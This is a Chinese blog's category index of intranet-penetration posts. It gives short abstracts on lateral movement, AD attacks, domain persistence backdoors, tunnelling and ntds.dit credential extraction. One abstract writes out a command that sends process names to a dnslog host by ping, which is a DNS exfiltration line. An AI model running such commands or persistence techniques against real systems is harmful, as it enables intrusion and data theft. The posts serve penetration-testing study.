随笔分类 - 内网渗透
摘要:https://blog.csdn.net/qq_41631806/article/details/118251231
阅读全文
摘要:FOFA搜索: microsoft exchange 2013: app="Microsoft-Exchange-2013"||app="Microsoft-Exchange-Server-2013-CU21"||app="Microsoft-Exchange-Server-2013-CU17"||
阅读全文
摘要:1、for循环实现 for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul 2、利用powershell foreach循环实现 powershell -c "Get
阅读全文
摘要:1、简介 SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道
阅读全文
摘要:LDAP(Light Directory Access Protocal)是一个基于X.500标准的轻量级目录访问协议,LDAP是支持跨平台的Internet协议,只需要通过LDAP做简单的配置就可以与服务器做认证交互。可以大大降低开发的成本。 windows Active Diretcory就是一
阅读全文
摘要:本文包含从 Internet 的各个角落收集的 PowerShell 命令列表,这些命令在渗透测试或红色团队练习期间可能会有所帮助。 该列表包括各种开发后的单行在纯 PowerShell 不需要任何攻击 (= 可能标记为恶意) 第三方模块, 但也一堆方便的管理命令. 查找包含敏感信息的文件 在开发后
阅读全文
摘要:一、实验拓扑: 实验目标:通过attacker机器直接访问到内网B区域机器 二、实验测试 1、vps上开启frp服务端服务 注意:建议使用vps地址使用短域名,这样方便后期更换服务器时,不用再去更改配置。 [common] #frp服务端监听 [VPS] bind_addr = 0.0.0.0 #f
阅读全文
摘要:一、简述 CrossC2插件是为企业和红队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /...),支持自定义模块,并包括一些常用的渗透模块。 利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。
阅读全文
摘要:活动目录使用备忘单 包含 Windows 活动目录的常见枚举和攻击方法的备忘单。 工具 Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus - >编译版本 BloodHound AD Module ASREPRoast 枚举 使用 Pow
阅读全文
摘要:一、执行java代码 简介 oracle提权漏洞集中存在于PL/SQL编写的函数、存储过程、包、触发器中。oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限)。定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础。 即无论调用者
阅读全文
摘要:一、简介 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID Histo
阅读全文
摘要:一、简介 SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Dige
阅读全文
摘要:一、DSRM简介 1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障
阅读全文
摘要:WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。 WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储
阅读全文
摘要:1.下载NTDSX http://www.ntdsxtract.com git clone https://github.com/csababarta/ntdsxtract 安装 python setup.py build && python setup.py install 将导出的ntds.di
阅读全文
摘要:一、简介 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。 在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%System
阅读全文
摘要:Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包
阅读全文